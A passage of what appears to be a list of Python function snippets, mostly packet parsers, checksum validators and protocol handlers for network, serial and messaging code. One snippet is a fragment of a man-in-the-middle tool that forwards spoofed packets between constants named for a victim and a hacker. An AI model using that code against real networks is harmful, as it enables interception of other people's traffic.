if pkt.is_syn():\n # this is a syn packet\n # set the sequence number to 0\n self.seqno = 0\n elif pkt.is_ack():\n # this is a plain ack\n # the sender got our data\n # just increment the sequence number\n self.seqno += 1\n return\n if pkt.empty():\n # this packet is emtpy?\n self._log.info(\"empty packet {}\".format(pkt))\n return\n # have the user recv the payload\n self._recv(pkt.payload)", "def check_ack_or_nak(message):\n value = message.body[-1]\n\n if value == 0x06:\n return\n elif value == 0x15:\n raise CommandFailure(command_code=message.command_code)\n else:\n raise RuntimeError(\"Unexpected ACK/NAK value (0x%02x)\" % value)", "def recvData(self) -> bytes:\n \n packet = self.recvPacket()\n if(packet.seq == Rudp.ackPlusOne(self.ack)):\n self.ack = Rudp.ackPlusOne(self.ack)\n self.acknowledgePacket(packet)\n return packet.payload\n else:\n return None", "def _do_some_logic(self, packet):\n\n\n pass", "def parse(self):\n try:\n if self.bitstream:\n # Parse message header\n self.bitstream.bytepos = 0\n\n if self.bitstream.endswith(\"\\n\"):\n pass\n\n else:\n raise PacketIncomplete(\"Packet does not end with carriage return\")\n\n if self.bitstream.find('0x 50 52 56 41 54',bytealigned=True): # If 'PRVAT' text in bitstream\n self.dataformat = 'NMEA'\n else:\n self.dataformat = 'TRITECH'\n\n if self.dataformat=='NMEA' and self.id != Message.CONFIGURATION_PARAM:\n # go to first comma\n self.bitstream.bytepos = self.bitstream.find('0x2C', bytealigned = True)[0]/8 + 1\n self.payload = self.bitstream.read('bytes:6')\n #skip comma\n self.bitstream.read('bytes:1')\n self.dataunits = self.bitstream.read('bytes:1')\n\n\n elif self.dataformat=='TRITECH' and self.id != Message.CONFIGURATION_PARAM:\n self.bitstream.bytepos = 0\n self.payload = self.bitstream.read('bytes:6')\n self.dataunits = self.bitstream.read('bytes:1')\n else:\n self.bitstream.bytepos = 0\n length_string = 'bytes:'+ str(len(self.bitstream)/8)\n self.payload = self.bitstream.read(length_string)\n\n else:\n pass\n\n except ValueError as e:\n raise PacketCorrupted(\"Unexpected error\", e)", "def parse_packet(packet, traffic_type, pkt_type, exp_dst, step):\n packet_count = 0\n if(traffic_type == \"encap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['IP']['src'] == DST_IP) and\n (packet[i]['Ethernet']['IP']['dst'] == H2_IP) and\n (packet[i]['Ethernet']['IP']['UDP']['dport'] ==\n str(UDP_DPORT)) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['vni'] == VNI_HEX) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['src'] == MAC_A) and\n (packet[i]['Ethernet']['IP']['UDP']['VXLAN']\n ['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect encapsulation'\n print(\"Correct encapsulation\")\n\n elif(traffic_type == \"decap\"):\n if(pkt_type == \"stp\"):\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == STP_DEST_MAC) and\n (packet[i]['Ethernet']['type'] == '0x8870')):\n packet_count += 1\n else:\n for i in packet:\n if ((packet[i]['Ethernet']['src'] == MAC_B) and\n (packet[i]['Ethernet']['dst'] == exp_dst)):\n packet_count += 1\n\n assert (packet_count == PKT_COUNT), 'Incorrect decapsulation'\n print(\"Correct decapsulation\")", "def process(self, packet):\n pass", "def read_versa5(self,addr,fullrepsonse=False):\n time.sleep(0.002)\n addr = addr & 0xff\n cmd = bytes([0x07,0xea,addr,0x00])\n res = self.command(0x3c,cmd)\n if fullresponse:\n return res\n else:\n return res.response_data & 0x0ff", "def _compute_checksum(packet):\n # checksum is the sum of the bytes\n # from device id to the end of the data\n # mod (%) 256 and bit negated (~) (1's compliment)\n # and (&) with 0xFF to make sure it is a byte.\n return ~(sum(packet[2:]) % 0x100) & 0xFF", "def process(self, data):\n\n\t\t# Check if the 802.15.4 packet is valid\n\t\tif makeFCS(data[:-2]) != data[-2:]:\n\t\t\tprint(hue.bad(\"Received invalid packet\"))\n\t\t\treturn\n\n\t\tpacket = Dot15d4FCS(data)\n\n\t\tif packet.fcf_frametype == 2: # ACK\n\t\t\tself.last_ack = packet.seqnum", "def checkChecksum(self):\n if not self.checkPacketLength():\n return False\n return CCSDS.DU.DataUnit.checkChecksum(self)", "def receive(self, packet):\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n # if packet.is_fin:\n # print(\"2nd wan sees a fin\")\n\n if packet.is_fin and len(packet.payload) == 0:\n # print(\"empty fin, foward fin\")\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash not in self.hash_to_raw_data.keys():\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = False)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # reset buffer\n self.send(packet, self.address_to_port[packet.dest]) # forward empty fin\n return\n \n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n \n if packet.is_raw_data:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n pack_buff += packet.payload\n\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n # print(\"sending1\")\n if block_hash in self.hash_to_raw_data.keys():\n # send extract data from hash in packet\n block_to_send = self.hash_to_raw_data[block_hash]\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n\n if remaining_buff:\n # print(\"wan to client remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n block_hash = get_hash(remaining_buff)\n block_to_send = remaining_buff\n # print(\"sending2\")\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n # print(\"sending fin1\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n if packet.is_fin:\n # print(\"sending fin2\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff\n else:\n block_hash = packet.payload\n block_to_send = self.hash_to_raw_data[block_hash]\n # print(\"sending3\")\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = False)\n if packet.is_fin:\n # print(\"sending fin3\")\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.address_to_port[packet.dest])\n # self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\" # TESTING\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n if packet.is_fin and len(packet.payload) == 0:\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n block_hash = get_hash(pack_buff)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = pack_buff\n self.send_data_in_packets(packet.src, packet.dest, True, False, pack_buff, is_wan_port = True)\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n self.send(packet, self.wan_port)\n return\n\n if (packet.src, packet.dest) not in self.srcdest_to_buffer.keys():\n self.srcdest_to_buffer[(packet.src, packet.dest)] = \"\"\n pack_buff = self.srcdest_to_buffer[(packet.src, packet.dest)]\n\n pack_buff += packet.payload\n block_list, remaining_buff = self.break_data_into_blocks(pack_buff)\n\n # send off all completed blocks\n for block_to_send in block_list:\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n\n if remaining_buff:\n # print(\"wan to wan remaining_buff: \" + remaining_buff)\n if packet.is_fin:\n # print(\"finfin\")\n block_to_send = remaining_buff\n block_hash = get_hash(block_to_send)\n if block_hash in self.hash_to_raw_data.keys():\n # send hash in packet\n pack = Packet(packet.src, packet.dest, False, False, block_hash)\n self.send(pack, self.wan_port)\n else:\n self.hash_to_raw_data[block_hash] = block_to_send\n self.send_data_in_packets(packet.src, packet.dest, True, False, block_to_send, is_wan_port = True)\n fin_pack = Packet(packet.src, packet.dest, True, True, \"\")\n self.send(fin_pack, self.wan_port)\n pack_buff = \"\"\n else:\n pack_buff = remaining_buff\n else:\n pack_buff = \"\"\n self.srcdest_to_buffer[(packet.src, packet.dest)] = pack_buff", "def EndOfPacket(self) -> bool:", "def handle_packet(self, pkt):\n logger.info('got a message:{}'.format(pkt))\n self._sock_rep_to_server.send_pyobj(packet.Ack())\n \n state = True\n extradata = {}\n \n if hasattr(self, 'handle_action'):\n _tmp = self.handle_action(pkt)\n try:\n state, data = _tmp\n extradata['extra'] = data\n except ValueError:\n extradata['extra'] = _tmp\n if extradata:\n state = False\n \n return state, extradata", "def process_message(msg):\n global fout\n print(\"received \")\n if len(msg)==200: #is header or end\n msg_in=msg.decode(\"utf-8\",\"ignore\")\n msg_in=msg_in.split(\",,\")\n if msg_in[0]==\"header\": #header\n filename=extract_file_data(msg_in[1])\n file_out=\"copy-\"+filename\n fout=open(file_out,\"wb\") #use a different filename\n\n if msg_in[0]==\"end\": #is it really last packet?\n in_hash_final=in_hash_md5.hexdigest()\n if in_hash_final==msg_in[2]:\n print(\"File copied OK -valid hash \",in_hash_final)\n else:\n print(\"Bad file receive \",in_hash_final)\n return False\n else:\n if msg_in[0]!=\"header\":\n in_hash_md5.update(msg)\n return True\n else:\n return False\n else:\n in_hash_md5.update(msg)\n #msg_in=msg.decode(\"utf-8\",\"ignore\")\n if len(msg) <100:\n print(msg)\n return True", "def parse_message(buffer):\n _discard_until_message_start(buffer)\n\n if buffer and buffer[0] == MESSAGE_FAILURE_BYTE:\n buffer[:] = buffer[1:]\n return MessageFailure(\n 'Command send failure (probable collision). Expect a retry.',\n ), 2 - len(buffer)\n\n # It takes at least 2 bytes to move forward.\n if len(buffer) < 2:\n return None, 2 - len(buffer)\n\n try:\n command_code = CommandCode(buffer[1])\n except ValueError:\n logger.warning(\n \"Unrecognized command code (0x%02x). Ignoring invalid data.\",\n buffer[1],\n )\n buffer[:2] = []\n\n return None, 2\n\n extension = 0\n\n # If the message is an Insteon message and has the extended flag, we expect\n # 14 user-data more bytes.\n if command_code == CommandCode.send_standard_or_extended_message:\n if len(buffer) >= 6 and buffer[5] & (1 << 4):\n extension = 14\n\n body, expected = _extract_body(\n buffer,\n BODY_SIZES[command_code] + extension,\n )\n\n # Not enough bytes to process the message. Let's wait for more.\n if body is None:\n return None, expected\n\n return (\n IncomingMessage(command_code=command_code, body=body),\n max(2 - len(buffer), 1),\n )", "def handle_flow(self, expected: [Flag]) -> Optional[dict]:\n try:\n segment = self.buffer.get(block=False)\n message = self.unpack_segment(segment)\n if message['flag'] in expected and self.valid_checksum(message):\n self.others_recv_win = message['win']\n return message\n except queue.Empty:\n pass\n return None", "def unpack(self, pkt):\n if pkt[0]!='$' or pkt[-3]!='#':\n raise ValueError('bad packet')\n if (sum(ord(c) for c in pkt[1:-3]) % 256) != int(pkt[-2:],16):\n raise ValueError('bad checksum')\n pkt = pkt[1:-3]\n return pkt", "def _parse_udp_packet(self, packet_bytes):\n opcode = packet_bytes[:2]\n if opcode == 5:\n reply = self.error_messages[int.from_bytes(packet_bytes[2:4], 'big')]\n print(reply)\n elif opcode == 4:\n reply = \"ACK\"\n else:\n reply = \"UNK\"\n return reply", "def acknowledge(self, validity = True) -> int:\n (data, s) = self.socket.recvfrom(Rudp.Packet.buffer())\n (packet, validity) = Rudp.Packet.unpack(data)\n if(validity and s == self.server):\n return packet.ack\n else:\n return None", "def ping(self):\n\t\t## NOTE: the Microblaze can only accept byte values between -128 and 127 (so 0xCF is too large)\n\t\trb = [0x00]\n\n\t\t# self.spi.transfer([0xCF], rb, 1)\n\t\t# mapped_cmd_byte = [_map_value(0xCF, 0, 255, -128, 127)]\n\t\tmapped_cmd_byte = [0xCF-128]\n\t\tself.spi.transfer(mapped_cmd_byte, rb, 1)\n\n\t\ttime.sleep(0.1)\n\t\tif rb[0] < 0: \t\t\t\t\t\t## Account for implicit unsigned-to-signed \n\t\t\trb[0] += 256\t\t\t\t\t## conversion from the transfer operation\n\t\treturn rb[0] == 0xF3", "def receive(self, packet):\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n if packet.is_raw_data:\n if not (packet.src, packet.dest) in self.buffer:\n self.buffer[packet.src, packet.dest] = \"\"\n start = len(self.buffer[(packet.src, packet.dest)])\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)] + packet.payload\n i = max(start, 47)\n while i < len(self.buffer[(packet.src, packet.dest)]):\n i += 1\n h = utils.get_hash(self.buffer[(packet.src, packet.dest)][i-48:i])\n if utils.get_last_n_bits(h, 13) == self.GLOBAL_MATCH_BITSTRING:\n block = self.buffer[(packet.src, packet.dest)][:i]\n self.cache[utils.get_hash(block)] = block\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)][i:]\n i = 47\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, False, block), self.address_to_port[packet.dest])\n\n # remainder = self.buffer[(packet.src, packet.dest)][self.BLOCK_SIZE:]\n \n if packet.is_fin:\n block = self.buffer[(packet.src, packet.dest)]\n self.cache[utils.get_hash(block)] = block\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, True, block), self.address_to_port[packet.dest])\n self.buffer[(packet.src, packet.dest)] = \"\"\n else:\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, packet.is_fin, self.cache[packet.payload]), self.address_to_port[packet.dest])\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n if packet.is_raw_data:\n if not (packet.src, packet.dest) in self.buffer:\n self.buffer[packet.src, packet.dest] = \"\"\n start = len(self.buffer[(packet.src, packet.dest)])\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)] + packet.payload\n i = max(start, 47)\n while i < len(self.buffer[(packet.src, packet.dest)]):\n i += 1\n h = utils.get_hash(self.buffer[(packet.src, packet.dest)][i-48:i])\n if utils.get_last_n_bits(h, 13) == self.GLOBAL_MATCH_BITSTRING:\n block = self.buffer[(packet.src, packet.dest)][:i]\n if utils.get_hash(block) in self.cache:\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, False, False, utils.get_hash(block)), self.wan_port)\n else:\n self.cache[utils.get_hash(block)] = block\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, False, block), self.wan_port)\n self.buffer[(packet.src, packet.dest)] = self.buffer[(packet.src, packet.dest)][i:]\n i = 47\n\n if packet.is_fin:\n block = self.buffer[(packet.src, packet.dest)]\n if utils.get_hash(block) in self.cache:\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, False, True, utils.get_hash(block)), self.wan_port)\n else:\n self.cache[utils.get_hash(block)] = block\n self.send_block(tcp_packet.Packet(packet.src, packet.dest, True, True, block), self.wan_port)\n self.buffer[(packet.src, packet.dest)] = \"\"\n else:\n # 1/0\n self.send_block(packet, self.wan_port)", "def _receive_check(self, length):\n data = self._receive(length)\n return data[:-1]", "def packet_handler(pkt):\n if pkt[Ether].type == 0x800:\n if pkt[IP].dst == VICTIM_IP:\n if pkt[Ether].dst == HACKER_MAC:\n print(pkt.summary()) # print spoofed packet\n pkt[Ether].dst = VICTIM_MAC\n PACKET_QUEUE.insert(0, pkt)", "def valid_response(line):\n cksum = int(line[-2:], 16) # checksum is last two characters in ASCII hex\n data = line[:-2] # remove checksum from data\n\n calc_cksum = checksum(data)\n if cksum != calc_cksum:\n log.debug('checksum failed (%r): should be %s', line, hex(calc_cksum))\n return False\n return True", "def pes_packet_check_formedness(payload):\n b1 = ord(payload[0])\n b2 = ord(payload[1])\n b3 = ord(payload[2])\n\n b4 = ord(payload[3])\n if b1 != 0 or b2 != 0 or b3 != 1:\n return False\n return True", "def process(self, raw: bytes) -> Tuple[bool, bytes]:\n line, raw = find_http_line(raw)\n if line is None:\n return False, raw\n\n if self.state == httpParserStates.INITIALIZED:\n self.process_line(line)\n self.state = httpParserStates.LINE_RCVD\n elif self.state in (httpParserStates.LINE_RCVD, httpParserStates.RCVING_HEADERS):\n if self.state == httpParserStates.LINE_RCVD:\n # LINE_RCVD state is equivalent to RCVING_HEADERS\n self.state = httpParserStates.RCVING_HEADERS\n if line.strip() == b'': # Blank line received.\n self.state = httpParserStates.HEADERS_COMPLETE\n else:\n self.process_header(line)\n\n # When connect request is received without a following host header\n # See\n # `TestHttpParser.test_connect_request_without_host_header_request_parse`\n # for details\n if self.state == httpParserStates.LINE_RCVD and \\\n self.type == httpParserTypes.RESPONSE_PARSER and \\\n raw == CRLF:\n self.state = httpParserStates.COMPLETE\n # When raw request has ended with \\r\\n\\r\\n and no more http headers are expected\n # See `TestHttpParser.test_request_parse_without_content_length` and\n # `TestHttpParser.test_response_parse_without_content_length` for details\n elif self.state == httpParserStates.HEADERS_COMPLETE and \\\n self.type == httpParserTypes.REQUEST_PARSER and \\\n self.method != httpMethods.POST and \\\n self.bytes.endswith(CRLF * 2):\n self.state = httpParserStates.COMPLETE\n elif self.state == httpParserStates.HEADERS_COMPLETE and \\\n self.type == httpParserTypes.REQUEST_PARSER and \\\n self.method == httpMethods.POST and \\\n (b'content-length' not in self.headers or\n (b'content-length' in self.headers and\n int(self.headers[b'content-length'][1]) == 0)) and \\\n self.bytes.endswith(CRLF * 2):\n self.state = httpParserStates.COMPLETE\n\n return len(raw) > 0, raw", "def parse(self):\n i = 1\n times = []\n while 1:\n byte = yield\n if byte== 0xaa:\n byte = yield # This byte should be \"\\aa\" too\n if byte== 0xaa:\n # packet synced by 0xaa 0xaa\n packet_length = yield\n packet_code = yield\n if packet_code == 0xd4:\n # standing by\n self.state = \"standby\"\n elif packet_code == 0xd0:\n self.state = \"connected\"\n elif packet_code == 0xd2:\n data_len = yield\n headset_id = yield\n headset_id += yield\n self.dongle_state = \"disconnected\"\n else:\n self.sending_data = True\n left = packet_length - 2\n while left>0:\n if packet_code ==0x80: # raw value\n row_length = yield\n a = yield\n b = yield\n value = struct.unpack(\"<h\",chr(b)+chr(a))[0]\n self.dispatch_data(\"raw\", value)\n left -= 2\n elif packet_code == 0x02: # Poor signal\n a = yield\n\n left -= 1\n elif packet_code == 0x04: # Attention (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"attention\", v)\n left-=1\n elif packet_code == 0x05: # Meditation (eSense)\n a = yield\n if a>0:\n v = struct.unpack(\"b\",chr(a))[0]\n if 0 < v <= 100:\n self.dispatch_data(\"meditation\", v)\n left-=1\n elif packet_code == 0x16: # Blink Strength\n self.current_blink_strength = yield\n \n left-=1\n elif packet_code == 0x83:\n vlength = yield\n self.current_vector = []\n for row in range(8):\n a = yield\n b = yield\n c = yield\n value = a*255*255+b*255+c\n left -= vlength\n self.dispatch_data(\"bands\", self.current_vector)\n packet_code = yield\n else:\n pass # sync failed\n else:\n pass # sync failed", "def after_process(self, packet, ret_packet):\n pass", "def is_complete(self, code):\n try:\n res = self.jiloop.parse().apply(code)\n output_class = res.getClass().getName()\n _, status = output_class.rsplit(\"$\", 1)\n if status == 'Success':\n return 'complete'\n elif status == 'Incomplete':\n return 'incomplete'\n else:\n return 'invalid'\n\n finally:\n self.jbyteout.reset()", "def state_cmd(self, byte):\n if byte in telnet_cmds:\n self.telnet_cmd.append(byte)\n if 251 <= byte <= 254:\n self.next_fn = self.state_option\n elif byte == 250:\n self.next_fn = self.state_sub\n else:\n self.handle_telnet_cmd(self.telnet_cmd)\n self.next_fn = self.state_text\n else:\n # unknown/invalid command\n self.next_fn = self.state_text", "def on_pes_packet_complete(self):\n pass", "def receive_packet(self, packet):\n\t\treturn", "def receive(self, packet):\n packet_key = (packet.src, packet.dest)\n # receiving wan\n if packet.dest in self.address_to_port:\n # The packet is destined to one of the clients connected to this middlebox;\n # send the packet there.\n\n if not packet.is_raw_data:\n block = self.hash_payloads[packet.payload]\n self.send_block(block, packet_key, packet.is_fin, False)\n else:\n self.add_packet_to_buffer(packet_key, packet)\n curr_block = self.buffers[packet_key]\n block_length = len(curr_block)\n left = 0\n right = 48 if block_length >= 48 else block_length\n while right <= block_length:\n block = curr_block[left:right]\n block_hash = utils.get_hash(block)\n is_delimiter = utils.get_last_n_bits(block_hash, 13) == self.GLOBAL_MATCH_BITSTRING\n if is_delimiter:\n send_block = curr_block[:right]\n curr_block = curr_block[right:]\n self.buffers[packet_key] = curr_block\n self.determine_if_hashed(send_block, packet_key, packet.is_fin, False)\n left = right\n if block_length - right >= 48:\n right = right + 48\n else:\n right = block_length\n if packet.is_fin:\n send_block = curr_block[left: block_length]\n self.determine_if_hashed(send_block, packet_key, True, False)\n self.buffers.pop(packet_key, None)\n break\n else:\n left = left + 1\n right = right + 1\n if packet_key in self.buffers:\n if packet.is_fin:\n send_block = self.buffers[packet_key]\n self.determine_if_hashed(send_block, packet_key, True, False)\n self.buffers.pop(packet_key, None)\n else:\n self.buffers.pop(packet_key, None)\n # sending wan\n else:\n # The packet must be destined to a host connected to the other middlebox\n # so send it across the WAN.\n\n self.add_packet_to_buffer(packet_key, packet)\n curr_block = self.buffers[packet_key]\n block_length = len(curr_block)\n left = 0\n right = 48 if block_length >= 48 else block_length\n while right <= block_length:\n block = curr_block[left:right]\n block_hash = utils.get_hash(block)\n is_delimiter = utils.get_last_n_bits(block_hash, 13) == self.GLOBAL_MATCH_BITSTRING\n if is_delimiter:\n send_block = curr_block[:right]\n curr_block = curr_block[right:]\n self.buffers[packet_key] = curr_block\n self.determine_if_hashed(send_block, packet_key, packet.is_fin, True)\n left = right\n if block_length - right >= 48:\n right = right + 48\n else:\n right = block_length\n if packet.is_fin:\n send_block = curr_block[left: block_length]\n self.determine_if_hashed(send_block, packet_key, True, True)\n self.buffers.pop(packet_key, None)\n break\n else:\n left = left + 1\n right = right + 1\n if packet_key in self.buffers:\n if packet.is_fin:\n send_block = self.buffers[packet_key]\n self.determine_if_hashed(send_block, packet_key, True, True)\n self.buffers.pop(packet_key, None)\n else:\n self.buffers.pop(packet_key, None)", "def state_COMMAND(self, command):\n\t\tif command.strip() == '':\n\t\t\tself.consecutiveErrors = self.consecutiveErrors + 1;\n\t\t\tif self.consecutiveErrors == 10:\n\t\t\t\tself.sendCode(221, 'Too Many Consectutive Protocol Errors (Your talking shit, Go Away)')\n\t\t\t\tself.do_QUIT()\n\t\t\treturn False;\n\t\tself.consecutiveErrors = 0\n\t\tsplits = command.split(None)\n\t\tmethod = getattr(self, 'do_' + splits[0].upper(), None)\n\t\tif method is not None:\n\t\t\tmethod(splits[1:])\n\t\telse:\n\t\t\tself.sendCode(500, 'Command Not Implemented')", "def decode_packet(data):\n\n opcodes = [(\"AUTH_LOGON_CHALLENGE\", \"\\x00\"), (\"AUTH_LOGON_PROOF\", \"\\x01\")]\n opcode = data[0] # Opcode of the received packet (First byte)\n if opcode == opcodes[0][1]: # Auth Logon challenge\n srp_rcvd = {\n 'error': data[1], # (you should hope that it is always 0)\n 'B': data[3:35], # Read B and skip 1 field (Length_g)\n 'g': data[36:37], # Read g and skip 1 field (Length_n)\n 'N': data[38:70],\n 's': data[70:102], # Read salt\n 'crc': data[102:] # (useless for private servers)\n }\n return srp_rcvd\n if opcode == opcodes[1][1]:\n # Auth logon proof\n if data[1] == \"\\x00\": # Code error: 0\n srp_rcvd = {'login': 1}\n else:\n srp_rcvd = {'login': 0}\n return srp_rcvd", "def next_byte(data_socket):\r\n return data_socket.recv(1)", "def next_byte(data_socket):\r\n return data_socket.recv(1)", "def done_parsing(self):\n # STUDENT\n return (self.input_buffer_len() == 1 ) and (self.stack_len()==1) \n # END STUDENT", "def parse(self, data=''):\n self.scratch += data\n for i in self.scratch:\n if self.state == AWAITING_CONTROL_LINE:\n\n # MSG\n if self.scratch.startswith(MSG_OP):\n self.state = AWAITING_MSG_ARG\n\n # OK\n elif self.scratch.startswith(OK):\n # No op. But still consume OK from buffer and set next state.\n if len(self.scratch) > OK_SIZE:\n self.scratch = self.scratch[OK_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR\n elif self.scratch.startswith(ERR_OP):\n self.state = AWAITING_MINUS_ERR_ARG\n\n # PONG\n elif self.scratch.startswith(PONG):\n self.nc._process_pong()\n\n if len(self.scratch) > PONG_SIZE:\n self.scratch = self.scratch[PONG_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n # PING\n elif self.scratch.startswith(PING):\n self.nc.send_command(PONG)\n if len(self.scratch) > PING_SIZE:\n self.scratch = self.scratch[PING_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE\n\n elif self.state == AWAITING_MSG_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n args = line.split(_SPC_)\n\n # Check in case of using a queue\n args_size = len(args)\n if args_size == 5:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = args[3]\n self.needed = int(args[4])\n elif args_size == 4:\n self.msg_arg[\"subject\"] = args[1]\n self.msg_arg[\"sid\"] = int(args[2])\n self.msg_arg[\"reply\"] = \"\"\n self.needed = int(args[3])\n else:\n raise ErrProtocol(\"Wrong number of arguments in MSG\")\n self.scratch = self.scratch[i+CRLF_SIZE:]\n self.state = AWAITING_MSG_PAYLOAD\n\n elif self.state == AWAITING_MSG_PAYLOAD:\n if len(self.scratch) >= self.needed:\n payload = self.scratch[:self.needed]\n subject = self.msg_arg[\"subject\"]\n sid = self.msg_arg[\"sid\"]\n reply = self.msg_arg[\"reply\"]\n\n # Set next stage already before dispatching to callback\n self.scratch = self.scratch[self.needed:]\n self.state = AWAITING_MSG_END\n\n msg = Msg(subject=subject, sid=sid, reply=reply, data=payload)\n self.nc._process_msg(msg)\n\n elif self.state == AWAITING_MSG_END:\n i = self.scratch.find(MSG_END)\n if i > 0:\n self.scratch = self.scratch[i+1:]\n self.state = AWAITING_CONTROL_LINE\n\n # -ERR 'error'\n elif self.state == AWAITING_MINUS_ERR_ARG:\n i = self.scratch.find(_CRLF_)\n if i > 0:\n line = self.scratch[:i]\n _, err = line.split(_SPC_, 1)\n self.nc._process_err(err)\n if len(self.scratch) > i+CRLF_SIZE:\n self.scratch = self.scratch[i+CRLF_SIZE:]\n else:\n self.scratch = b''\n self.state = AWAITING_CONTROL_LINE", "def validate(msg):\n valid = True\n\n if not msg or len(msg) < 4:\n return False, -1, -1\n\n checksum = msg[-1]\n length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n # try:\n # # here works for pyton 3 only\n # length = int.from_bytes(msg[1:3], byteorder='big', signed=False)\n # except Exception:\n # length = int(''.join('{:02X}'.format(byte) for byte in msg[1:3]), 16)\n\n validlen = len(msg[3:-1])\n validsum = 0xFF - ((sum(msg[3:-1])) & 0xFF)\n\n # print('length: ' + str(self.length) + '; ' + str(validlen))\n # print('checksum: ' + str(self.checksum) + '; ' + str(validsum))\n\n # check sanity of computed Length and Checksum with the one in the message\n if (checksum != validsum) or (length != validlen):\n valid = False\n\n return valid, length, checksum", "def isOK(ser):\n while 1:\n msg=ser.readline(300)\n if msg.find(\"<\")!=-1:\n break\n if msg.find(\"<OK\")!=-1:\n return True\n return False", "def _handle_ok_ack(string):\n if string.strip() == Parser.OK_MSG:\n return True\n return False", "def handle_packet(self, packet):\n if self.compression:\n compression_len, packet = ParseVarInt(packet, consume=True)\n\n # if we have compressed data decompress it\n if compression_len != 0:\n packet = zlib.decompress(bytearray(packet))\n\n packet_id, packet = ParseVarInt(packet, consume=True)\n try:\n packet_id = str(self.state(packet_id))\n except ValueError:\n # print(\"Unknown packet ID %s for state %s\" % (hex(packet_id), self.state))\n pass\n\n try:\n func = getattr(self, \"handle_\" + packet_id.split(\".\")[1])\n packet = func(packet=packet)\n assert len(packet) == 0\n except AttributeError:\n # print(\"Unknown packet: %s\" % packet)\n pass", "def read_byte():\n try:\n result = ord(self._buffer[read_cursor[0]])\n read_cursor[0] += 1\n return result\n except IndexError:\n raise ASN1WantMore('Premature end of input.')", "def 